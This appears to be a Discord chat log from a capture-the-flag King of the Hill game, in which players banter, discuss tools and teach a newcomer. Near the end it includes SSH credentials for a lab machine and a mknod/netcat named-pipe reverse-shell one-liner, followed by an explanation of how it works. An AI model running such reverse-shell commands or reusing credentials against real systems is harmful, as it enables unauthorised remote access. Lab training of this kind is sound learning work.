mellow bough
#

You're welcome and thanks!

rugged pumice
fair adder
#

will hop in!

rugged pumice
#

welp, what box is this?

void rivet
#

@rugged pumice can i get spectater link pls

rugged pumice
#

you can join here 1 min

void rivet
#

nah i cant ive got people round atm

#

thanks

#

what box is it

fair adder
#

I feel as Paradox, you and I have to duel at some point @void rivet

void rivet
#

im new to all this dude theres no point u will win xD

fair adder
#

The victory means nothing

#

It would be a duel based purely on names

void rivet
#

alright xD

#

can later if u want ?

fair adder
#

Not right now

#

But we'll discuss this agin

void rivet
#

hehe

#

i will put respek on my name

#

xD

fair adder
#

bastards killing my shells

#

LOL

vagrant monolith
#

Hahah

void rivet
#

@rugged pumice what box u on

vagrant monolith
#

I just learned who how on the twitch channel @fair adder

#

๐Ÿ˜›

#

errr how*

fair adder
#

WOOOOW

#

this guy

stable narwhal
#

@dapper escarp no worries! More just something to watch to pass time aha

vagrant monolith
#

@fair adder howww

#

you got back

fair adder
#

:D

#

ill tell ya after this game

vagrant monolith
#

I stopped you now, for sure?

fair adder
#

we'll see

rugged pumice
dapper escarp
#

Should be up tomorrow. Gunna do some pwk then stream in the evening I think

fair adder
#

oh wow

vagrant monolith
#

How did you...

#

omg

desert kernel
#

lol

gusty cradle
#

@vagrant monolith What?

vagrant monolith
#

@fair adder keeps on fighting back and I have no idea how

gusty cradle
#

@vagrant monolith Did you use chattr?

vagrant monolith
#

Yes

fair adder
#

yes he did

gusty cradle
#

Did you uninstall the package

fair adder
#

he did not

vagrant monolith
#

Haha

fair adder
#

OH

gusty cradle
#

Then why does chattr not work anymore?

ember agate
#

i got the same problem two days before

#

and it randomly started to work

vagrant monolith
fair adder
#

lololol

ember agate
#

was it that food box?

fair adder
#

i know what he did

gusty cradle
#

@fair adder Tell me

#

๐Ÿ˜

vagrant monolith
#

Somehow @fair adder still manages to change the file some times

gusty cradle
#

He can not fight both of us

fair adder
#

wooooooooooow

gusty cradle
#

There is a way to reverse chattr permissions but its not working right now

fair adder
#

two minutes left lol

#

gg wp

vagrant monolith
#

you to!

desert kernel
#

Goed gedaan tom

#

๐Ÿ™‚

#

GG

vagrant monolith
#

Bedankt! Love this game mode

fair adder
#

yeah it's a lot of fun

ember agate
#

will you play another one?

fair adder
#

im down as long as @vagrant monolith doesnt grief me the whole time LOL

vagrant monolith
#

Hahaha

fair adder
#

jk

vagrant monolith
#

I need to go to sleep

fair adder
#

name of the game

vagrant monolith
#

Good luck!

fair adder
#

join public if you're game

ember agate
gusty cradle
#

@ember agate May I join?

cobalt jackal
#

@ember agate @nova prawn @fair adder join voice channel

fair adder
#

we're up here

#

if you wanna move up

cobalt jackal
#

oh lol

fair adder
#

well

#

yeah

#

@ember agate join voice?

steep raptor
#

voice

steep raptor
lusty portal
#

@steep raptor You're loving these KoTH games:)

fair adder
#

don't encourage him

#

โค๏ธ

steep raptor
#

@lusty portal smash mode learning

#

there are two more slots in public

void rivet
#

well hello there OreoByte

#

xD

steep raptor
#

hello once again @void rivet

void rivet
#

;*

#

lets hope my vpn doesnt end itself

#

like its been doing all day

#

glhf

#

thats the only box idk how to do

dapper escarp
#

echo "oldpass\nNewPass\nNewPass\n" | passwd

rigid raptor
#

<newpassword> would be a pretty good password

void rivet
#

using burpsuite how can i look at incoming pings/traffic?

#

if im allowed to ask

#

if im not allowed to ask then sorry

fair adder
#

whatcha mean

void rivet
#

i dont think u can tell me because its something to do withna box

rigid raptor
#

You'd have to route incoming traffic through burp, which takes a little more work that telling the browser to proxy through burp, and I don't know if burp allows that sort of shenanigance in the first place. You should just use a different tool for incoming traffic. If nothing else, tcpdump

void rivet
#

im on james box

#

and its annoying

#

xD

quiet schooner
#

@void rivet You enjoying the patch?

meager cloak
#

pasta:123123123

void rivet
#

guessin pasta is a user

quiet schooner
#

it's always u:p

void rivet
#

idk what 123123123 is though

#

xD

quiet schooner
#

@void rivet user:pass

void rivet
#

that aint the pass just tried it

#

123123123

quiet schooner
#

kek you either mistyped it or someone changed it from when suitguy set it, or he was trolling

void rivet
#

O_o

#

says permission denied lol

#

been locked out aint i

#

xD

#

or its wrong

#

@meager cloak ur mean, thought i was bout to get somewhere xD

meager cloak
#

It's 100% the password for pasta ssh

void rivet
#

someone must have locked it then

#

but no one has a flag yet

#

so idk

#

oof

meager cloak
#

ssh pasta@10.10.142.159

#

123123123

void rivet
#

wow

#

i mustve spelled somethin wrong

#

rip me

meager cloak
#

mknod "/dev/shm/.pipe" p; cat "/dev/shm/.pipe" | /bin/bash -i 2>&1 | nc 127.0.0.1 12345 >"dev/shm/.pipe"

void rivet
#

legit im so stupid lol

#

whats that ^^??

#

ohhhh

rigid raptor
#

any difference between mknod p and mkfifo?

meager cloak
#

mkfifo is mknod <file> p

quiet schooner
#

mknod is a named pipe

rigid raptor
#

Figured, but wanted to make sure

void rivet
#

can u explain that to me cause i dont wanna just use it withoput knowing what it does, wanna learn aha

meager cloak
#

man mknod

terse willow
#

D'you know what a FIFO is @void rivet?

void rivet
#

nope

terse willow
#

Have you used a pipe command before?

rigid raptor
#

it's basically just | but instead of the symbol it's a file

void rivet
#

oh ok

terse willow
#

That ^^
It's a file that has an input and an output. You can't read from it unless something is being written out, and vice versa

void rivet
#

and no i havent, im new to all this and trying to learn from doing koth's

terse willow
#

That makes it really good for reverse shells

rigid raptor
#

because the data has to go in a loop a | b | c | a

terse willow
#

The command up there is making a FIFO (First I*n First Out). It's then taking the output of the file and putting it into an interactive bash shell

#

The shell is being sent using netcat

quiet schooner
#

Isn't it first in first out?

#

Because buffer?